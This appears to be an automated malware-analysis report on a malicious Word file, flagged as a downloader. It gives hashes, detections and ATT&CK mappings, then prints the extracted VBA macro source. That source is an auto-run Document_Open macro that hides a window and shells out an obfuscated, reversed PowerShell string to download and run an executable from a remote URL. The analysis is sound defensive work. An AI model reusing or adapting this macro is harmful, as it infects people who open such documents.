Office (OLE) malware analysis — malicious · 8b975ee7a77569a0

MALICIOUS

Office (OLE)

70.6 KB Created: 2018-09-07 07:42:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: e698ef4748d27de3cea40acdc86e37ee SHA-1: 6687edc33397df85aded71405e8f591c825d9294 SHA-256: 8b975ee7a77569a08935b5b78f23abcaf62297ff773fd2c4ccd4d30995202a46

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.Valyria-6922870-0' further supports this downloader functionality. No specific family could be identified.

Heuristics 5

ClamAV: Doc.Downloader.Valyria-6922870-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6922870-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4828 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4828 bytes
SHA-256: `615f0a83ae0f9fb87fdfd20c9611a189a5c7da4810fa8a20a81a32d770e6696e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "otmGmsB" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Month Format("cBM" + "6456" + "506586651" + "pv") Month Format("7376" + "2904" + "cwiYpmImo" + "izkS") Month Format("pdLTrchiWZvUpc" + "PMZS" + "9238" + "ZWfY") Month Format("516670532" + "3113" + "5240" + "CCOiEzudIEw") Shell Format(WXEoXtT) + Format(ldrtQbuW) + Format(bJztbstUiO) + GjESimlrX + WaGrADKwvF + Format(wmvNzlAwkJ) + Format(okhOpzC), Format(vbHide) Month Format("37731311" + "7792" + "qBMUPvB" + "349698388") Month Format("dK" + "ZdBA") Month Format("ElER" + "S") End Sub Attribute VB_Name = "JwtPwEmA" Function GjESimlrX() On _ Error _ Resume _ Next Month Format("8201" + "20761442") Month Format("5678" + "458802790") QCKHJZdZPAZ = Chr(13 + 4 + 13 + 8 + 61) + "md /" + "V" + ":O/" + Chr(9 + 3 + 9 + 5 + 41) + Chr(4 + 1 + 4 + 2 + 23) + "^s^e" Month Format("fvrPKqUcp" + "QqomZr" + "3235" + "417520852") Month Format("zdKwV" + "112527027") Month Format("birrqwhpmJbZ" + "RzWAA") GisRbBdFmJS = "^t ^" + "f" + "V" + "^" + "l=^ ^" + " ^ ^ " + " ^ ^ " + " " + " ^ ^ " + " ^ }}{" Month Format("1484" + "nNTN" + "282398022" + "397527212") Month Format("iY" + "6062") iPwOkkqO = "h" + Chr(13 + 4 + 13 + 8 + 61) + "^ta" + Chr(13 + 4 + 13 + 8 + 61) + "^};^k" + "a^" + "er^b^;^" + "zvl$" + "^" + " ^m^e" + "t^I-e" + "^k^o" + "vnI^;" + ")^zv^" Month Format("201932913" + "u") Month Format("rRmY" + "XswXsVmB" + "449657584" + "CZp") Month Format("EK" + "425940058" + "317883606" + "Q") HOJqjfl = "l$" + "^ ^,u" + "Uq$(el" + "^i^F" + "^d^" + "a" + "^o" + "l" + "n^" + "woD" Month Format("1783" + "490" + "ma" + "162482997") Month Format("4032" + "vEh" + "YzwFJvdV" + "vVb") JfmaAPKPB = "." + "a" + Chr(9 + 3 + 9 + 5 + 41) + "^s^${" + "^yr" + "^t^{)" + "rb" GjESimlrX = QCKHJZdZPAZ + GisRbBdFmJS + iPwOkkqO + HOJqjfl + JfmaAPKPB Month Format("O" + "1744" + "St" + "5572") Month Format("fVmq" + "MQCac" + "pPZXuQd" + "5514") End Function Function WaGrADKwvF() On _ Error _ Resume _ Next Month Format("150154956" + "wtrwKGaBt" + "7069" + "131819422") Month Format("37105581" + "8681" + "234886046" + "OliN") Month Format("L" + "526589519" + "136174526" + "t") TmUPGdjlIsY = "r^$ ni " + "^uU^q^" + "$" + "(^h" + Chr(13 + 4 + 13 + 8 + 61) + "a^" + "ero^" Month Format("im" + "266351690" + "GcTCpnmlh" + "vrNFqBhA") Month Format("134811289" + "MDQXXdW" + "TSGJ" + "bjkAzQQWjAli") Month Format("EftjBrWV" + "zbJ" + "Nzz" + "qnX") jVfwiXwhIR = "f" + ";^'" + "^ex^e.'" + "+^LL^j^" + "$^+'\'" + "^+" + Chr(13 + 4 + 13 + 8 + 61) + "il^bu" + "p^:v" + "n" + "^" + "e^$=" Month Format("TqME" + "353039231") oGlmHAn = "^zv^l^$" + ";^'" + "^" + "48" + "' =" + "^ " + "L^Lj" + "^$;" + ")^'@'(" + "ti^l" + "p^S.^'n" + "kt.^" Month Format("qTdUtz" + "71360003") Month Format("ICDWYNwpp" + "IC" + "CisXXdzc" + "C") vJXIlRNSQtW = "5kn^b" + "^k=^l" + "^?php" + "^.t^ok" + "sn^" + "ap" Month Format("tRW" + "1289" + "WRZ" + "5726") sXHCmiDY = "o/" + "TTR/mo" + Chr(13 + 4 + 13 + 8 + 61) + ".^m6^" + "hs^hq" + "p8" + "^3^ma" + "k^ft//^" Month Format("7856" + "7751") Month Format("5423" + "439376894") Month Format("ihf" + "AXzv") Month Format("okzW" + "4409") iXFQjWhWak = ":^p^t" + "^th'=r^" + "br$;^t" + "ne" + "^i^" + "l" + Chr(9 + 3 + 9 + 5 + 41) + "b^e^" + "W^.t^eN" + " ^" + "t" + Chr(13 + 4 + 13 + 8 + 61) + "^e^j^" + "b" Month Format("379284537" + "100202972") KPuwakw = "o^-^" + "w^e" + "n=a" + Chr(9 + 3 + 9 + 5 + 41) + "s^$ ^l" + "leh^s" + "r^" + "e^w^op" + "&" + "&" + "f" + "^or /^" + "L %" Month Format("525061427" + "w") Month Format("3649" + "9130") tkskUi = "^4" + " " + "^in " + "(^2^" + "6^" + "3,^-1^," + "0)" + "^d^o ^s" + "e^" Month Format("3396" + "SMk" + "dWLvRsqwabiF" + "374210869") Month Forma ... (truncated)

SHA-256: 615f0a83ae0f9fb87fdfd20c9611a189a5c7da4810fa8a20a81a32d770e6696e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "otmGmsB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Month Format("cBM" + "6456" + "506586651" + "pv")
   Month Format("7376" + "2904" + "cwiYpmImo" + "izkS")
   Month Format("pdLTrchiWZvUpc" + "PMZS" + "9238" + "ZWfY")
   Month Format("516670532" + "3113" + "5240" + "CCOiEzudIEw")
Shell Format(WXEoXtT) + Format(ldrtQbuW) + Format(bJztbstUiO) + GjESimlrX + WaGrADKwvF + Format(wmvNzlAwkJ) + Format(okhOpzC), Format(vbHide)
   Month Format("37731311" + "7792" + "qBMUPvB" + "349698388")
   Month Format("dK" + "ZdBA")
   Month Format("ElER" + "S")
End Sub



Attribute VB_Name = "JwtPwEmA"
Function GjESimlrX()

On _
Error _
Resume _
Next
Month Format("8201" + "20761442")
   Month Format("5678" + "458802790")
QCKHJZdZPAZ = Chr(13 + 4 + 13 + 8 + 61) + "md /" + "V" + ":O/" + Chr(9 + 3 + 9 + 5 + 41) + Chr(4 + 1 + 4 + 2 + 23) + "^s^e"
Month Format("fvrPKqUcp" + "QqomZr" + "3235" + "417520852")
   Month Format("zdKwV" + "112527027")
   Month Format("birrqwhpmJbZ" + "RzWAA")
GisRbBdFmJS = "^t ^" + "f" + "V" + "^" + "l=^ ^" + "  ^ ^  " + " ^ ^ " + " " + " ^  ^ " + "  ^ }}{"
Month Format("1484" + "nNTN" + "282398022" + "397527212")
   Month Format("iY" + "6062")
iPwOkkqO = "h" + Chr(13 + 4 + 13 + 8 + 61) + "^ta" + Chr(13 + 4 + 13 + 8 + 61) + "^};^k" + "a^" + "er^b^;^" + "zvl$" + "^" + " ^m^e" + "t^I-e" + "^k^o" + "vnI^;" + ")^zv^"
Month Format("201932913" + "u")
   Month Format("rRmY" + "XswXsVmB" + "449657584" + "CZp")
   Month Format("EK" + "425940058" + "317883606" + "Q")
HOJqjfl = "l$" + "^ ^,u" + "Uq$(el" + "^i^F" + "^d^" + "a" + "^o" + "l" + "n^" + "woD"
Month Format("1783" + "490" + "ma" + "162482997")
   Month Format("4032" + "vEh" + "YzwFJvdV" + "vVb")
JfmaAPKPB = "." + "a" + Chr(9 + 3 + 9 + 5 + 41) + "^s^${" + "^yr" + "^t^{)" + "rb"
GjESimlrX = QCKHJZdZPAZ + GisRbBdFmJS + iPwOkkqO + HOJqjfl + JfmaAPKPB
   Month Format("O" + "1744" + "St" + "5572")
   Month Format("fVmq" + "MQCac" + "pPZXuQd" + "5514")
End Function
Function WaGrADKwvF()

On _
Error _
Resume _
Next
Month Format("150154956" + "wtrwKGaBt" + "7069" + "131819422")
   Month Format("37105581" + "8681" + "234886046" + "OliN")
   Month Format("L" + "526589519" + "136174526" + "t")
TmUPGdjlIsY = "r^$ ni " + "^uU^q^" + "$" + "(^h" + Chr(13 + 4 + 13 + 8 + 61) + "a^" + "ero^"
Month Format("im" + "266351690" + "GcTCpnmlh" + "vrNFqBhA")
   Month Format("134811289" + "MDQXXdW" + "TSGJ" + "bjkAzQQWjAli")
   Month Format("EftjBrWV" + "zbJ" + "Nzz" + "qnX")
jVfwiXwhIR = "f" + ";^'" + "^ex^e.'" + "+^LL^j^" + "$^+'\'" + "^+" + Chr(13 + 4 + 13 + 8 + 61) + "il^bu" + "p^:v" + "n" + "^" + "e^$="
Month Format("TqME" + "353039231")
oGlmHAn = "^zv^l^$" + ";^'" + "^" + "48" + "' =" + "^ " + "L^Lj" + "^$;" + ")^'@'(" + "ti^l" + "p^S.^'n" + "kt.^"
Month Format("qTdUtz" + "71360003")
   Month Format("ICDWYNwpp" + "IC" + "CisXXdzc" + "C")
vJXIlRNSQtW = "5kn^b" + "^k=^l" + "^?php" + "^.t^ok" + "sn^" + "ap"
Month Format("tRW" + "1289" + "WRZ" + "5726")
sXHCmiDY = "o/" + "TTR/mo" + Chr(13 + 4 + 13 + 8 + 61) + ".^m6^" + "hs^hq" + "p8" + "^3^ma" + "k^ft//^"
Month Format("7856" + "7751")
   Month Format("5423" + "439376894")
   Month Format("ihf" + "AXzv")
   Month Format("okzW" + "4409")
iXFQjWhWak = ":^p^t" + "^th'=r^" + "br$;^t" + "ne" + "^i^" + "l" + Chr(9 + 3 + 9 + 5 + 41) + "b^e^" + "W^.t^eN" + " ^" + "t" + Chr(13 + 4 + 13 + 8 + 61) + "^e^j^" + "b"
Month Format("379284537" + "100202972")
KPuwakw = "o^-^" + "w^e" + "n=a" + Chr(9 + 3 + 9 + 5 + 41) + "s^$ ^l" + "leh^s" + "r^" + "e^w^op" + "&" + "&" + "f" + "^or /^" + "L %"
Month Format("525061427" + "w")
   Month Format("3649" + "9130")
tkskUi = "^4" + " " + "^in " + "(^2^" + "6^" + "3,^-1^," + "0)" + "^d^o ^s" + "e^"
Month Format("3396" + "SMk" + "dWLvRsqwabiF" + "374210869")
   Month Forma
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.